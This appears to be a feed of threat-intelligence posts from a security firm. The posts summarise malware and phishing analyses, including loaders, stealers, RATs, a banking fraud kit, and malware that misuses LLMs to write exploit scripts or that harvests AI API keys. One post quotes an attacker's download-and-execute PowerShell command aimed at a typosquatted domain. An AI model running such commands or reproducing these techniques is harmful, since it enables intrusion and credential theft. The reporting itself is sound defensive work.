Joe Security

🚨 New malware analysis: Trojanized Solara/Yuta loader abusing LLM functionality 🤖⚠️ The .NET app masquerades as a Roblox utility while integrating DeepSeek to generate Roblox Luau exploit scripts. Its hardcoded prompt steers the model toward exploit-oriented primitives such as hookmetamethod(), hookfunction(), getgenv(), gethui(), and remote invocation. It also includes an "AI reconstructor" feature that feeds Roblox script sources into the LLM to clean, rename, comment, reconstruct, and deobfuscate code while preserving functionality. 🧩 But the AI features are only part of the story: behind the UI, the app silently retrieves a second-stage Python stealer/RAT via Pastebin → MediaFire. 📥 The payload includes credential theft, Discord/Telegram C2, persistence, keylogging, screenshot capture, AMSI/ETW patching, and Defender evasion. https://t.co/EjJZ32Cvlz Verdict: Malicious — 10/10 🔥

Unknown phishing kit with browser-fingerprinting / VM-detection spotted 🕵️‍♂️ The script probes WebGL, RTC/STUN, plugins, console behavior, prototype hooks, screen/window/navigator props and more to identify analysis environments. Joe Sandbox detects the evasion and directly chains the run to a bare-metal analyzer — where the phishing payload continues execution 💪🔥 🔗 https://t.co/QHALS8BAng 🔗 https://t.co/JBLeNsGF5P #JoeSandbox #Phishing #MalwareAnalysis #ThreatIntel #CyberSecurity #DFIR #Evasion

🚨 New analysis from Joe Reverser: Sikka BFaaS — an operationalized Indian banking fraud toolkit targeting SBI, HDFC, Paytm, BHIM/NPCI UPI, FreeCharge, PhonePe, Axis Bank & IRCTC. 🔐 Implements HWID-bound licensing, reseller/operator roles, AES-encrypted C2 traffic, and encrypted `.rg` session files. 🧬 Uses stolen mobile banking API keys, device fingerprint spoofing, OAuth/session hijacking, OTP interception flows, and UPI cryptographic abuse. 🛡️ Includes anti-debugging, VM checks, tool blacklisting, registry tampering, and Chrome/WebDriver automation. Deep technical breakdown in Joe Reverser. 🔍⚙️ https://t.co/xipiXHZGOX

🚨 Firebase-Powered PowerShell Backdoor Targeting Indian Entities 🚨 🔴 Key findings: • Fake PDF decoy dropped to distract victims 📄 • Persistence via disguised Microsoft Edge scheduled task 🕵️ • Firebase used as stealth C2 infrastructure ☁️ • Remote command execution through PowerShell ⚡ • Typosquatting domain: thehindus[.]org impersonating The Hindu 📰 • Hidden stage-2 payload: `irm https[:]//thehindus[.]org/jk | iex` 🧬 TTPs observed: ✅ PowerShell abuse ✅ LOLBins (`conhost.exe --headless`) ✅ Base64 obfuscation ✅ Firebase dead-drop C2 ✅ Scheduled task persistence ✅ Recon + exfiltration 🎯 Likely aligned with SideCopy-style tradecraft targeting Indian entities. IOC Highlights: 🌐 thehindus[.]org 🌐 my-automation-a936d-default-rtdb[.]firebaseio[.]com 🧾 SHA256: 8c91214e0553bb3bd6c57b9eaae70099fe2d5bcd44a6beeaa3e3fab4f775397c Verdict: 🔥 MALICIOUS (9/10) https://t.co/Avut13Ws1j #Malware #ThreatIntel #CyberSecurity #DFIR #ThreatHunting #PowerShell #APT #SideCopy #InfoSec #MalwareAnalysis

🚨 AI-generated phishing kits are evolving FAST. We analyzed a fully operational Microsoft 365 AiTM phishing framework using: ☁️ Cloudflare Tunnels 🛡️ Dual CAPTCHA gates 🎯 Targeted victim prefill 🔑 Real-time MFA interception 🤖 Strong LLM-generated code fingerprints Attack flow: Google Redirect → CAPTCHA → CAPTCHA → Fake Microsoft Login → Live Credential Relay Highlights: ⚡ MFA push approval interception 🌍 Victim fingerprinting via 4 IP intel services 🎭 Multi-brand impersonation (OneDrive, Adobe, Teams, SharePoint & more) 🔄 Dynamic OAuth-style URL obfuscation 💸 Zero-cost rotating infrastructure via TryCloudflare This wasn't a simple phishing page. It was a scalable AI-assisted phishing platform. Full technical analysis below 👇 https://t.co/oJwWeDKHTv #CyberSecurity #Phishing #AiTM #ThreatIntelligence #M365 #SOC #DFIR #Cloudflare #OSINT #MalwareAnalysis #Infosec #CyberThreats #LLM

🚨 New research from Joe Security: A spear-phishing campaign targeting Pakistan’s PSCA & PPIC3 abused ⚡ VS Code Remote Tunnels and Discord webhooks for stealthy remote access. Instead of stealing Microsoft accounts, attackers enrolled victim machines into their own VS Code tunnel infrastructure using device-code authentication - a clever twist on classic phishing techniques. 🎯 Key findings: 🔹 Malicious Office macros downloading & executing `code.exe` 🔹 Abuse of legitimate VS Code tunneling workflows 🔹 Discord webhooks used for exfiltration & status reporting 🔹 ClickOnce-based PDF delivery chain impersonating Adobe Reader 🔹 Trusted Microsoft infrastructure leveraged for persistence & stealth This campaign highlights how threat actors increasingly weaponize legitimate developer tooling to blend into normal cloud traffic. ☁️💻 Read the full analysis here 👇 https://t.co/MQ9X4vuwhz #CyberSecurity #ThreatIntelligence #MalwareAnalysis #Phishing #VSCode #Microsoft #BlueTeam #DFIR #JoeSecurity

🚨 Auphora Stealer: AI apps entering infostealer scope Early signals point to "Claude-aware" collection routines (e.g., harvest_claude()): • Electron storage parsing (LevelDB / IndexedDB) • Session cookies & auth artifacts • Extensions / MCP configs • User context data 🎯 Primary objective: Anthropic API keys – from LevelDB state – from ANTHROPIC_API_KEY env vars AI desktops should be treated like browsers—same surface, higher value. https://t.co/LdQLSxJSGx

🚨 Threat Insight: Emerging LLM-Generated Infostealer 🤖🛑 A Python-based infostealer 🐍 has surfaced under the label “HackerAI Stealer Pipeline,” presented as an “authorized pentesting tool.” Despite the branding, the workflow clearly aligns with credential-theft operations: Chrome password extraction 🔐 → data staging 📦 → Telegram exfiltration 📤 → self-deletion 🧹. Attribution to a specific platform remains unverified ⚠️. However, the structured pipeline, consistent formatting, and descriptive comments strongly suggest LLM-assisted development 🧠💻. This reflects a broader shift 📈: adversaries are leveraging AI to rapidly generate and refine commodity malware, reducing development effort while increasing scalability. https://t.co/Y5DVV5fBzP #ThreatIntel #CyberSecurity #Malware #LLM

🚨 Malware Analysis Drop 🚨 A trojanized UninstallTool.exe isn’t what it claims to be… 🔍 Static reversing (Joe Reverser): • Fake Authenticode signer 🎭 • Embedded PE payload + .NET in-memory loader 🧩 • Privilege escalation & persistence APIs ⚙️ 🧪 Dynamic analysis (Joe Sandbox): • 100/100 malicious score 💯 • ZTrat RAT with ngrok C2 tunnel 🌐 • Drops Recovery.exe + scheduled task persistence ⏱️ • Firewall bypass & stealthy comms 🔥 🎯 Verdict: Legit app disguise → full RAT infection chain Static + dynamic = full visibility 👀 https://t.co/6gOGxn6v9Q https://t.co/uxPvvhHpF0 #malware #cybersecurity #threatintel #reverseengineering

🚨 Advanced spear-phishing campaign uncovered by Joe Reverser Initial access via themed lure ("Safe Jail Project") with dual attachments: • DOC: VBA macro dropper executing staged payload • PDF: Fake Adobe Reader lure triggering alternate infection path Payload delivery via BunnyCDN-backed infrastructure → execution establishes persistence by abusing Microsoft VS Code Remote Tunnel (LOLbin technique) C2/exfiltration signaling via Discord webhook — blending malicious traffic with trusted services to evade detection 🧠 Detected & analyzed by Joe Reverser 🔍 Full technical breakdown: https://t.co/cpOM7TSTG0

🚨 CVE-2026-34621 – Adobe Acrobat Reader PDF Vulnerability 📄⚠️ Multiple analysts have taken a deep dive into this threat using 🧪 Joe Reverser — definitely worth exploring: 🔍 Analysis #1 https://t.co/Fl6aKvIUkW 🔍 Analysis #2 https://t.co/zO9hluBRt7 Packed with insights into modern PDF exploitation techniques 💡🛠️ #malware #infosec #threatanalysis

🚨 Joe Reverser's Export Mode (rebranded from Skill Only Mode) in action - you can dive deep, ask the agent specific questions, and really understand what’s going on inside a sample. Take this recent case 👇 A 64-bit loader hiding a Meterpreter reverse shell: • RC4-encrypted payload in .fltpk • Dynamic API resolution via PEB walking • Anti-debugging (RDTSC + BeingDebugged) • Heavy obfuscation to evade static tools No more just reading reports — now you can explore and question every layer. 🔬 Check the report: https://t.co/5GEB7cC0Fy ✨ Bonus: The report now includes a capability image + workflow & IOC diagrams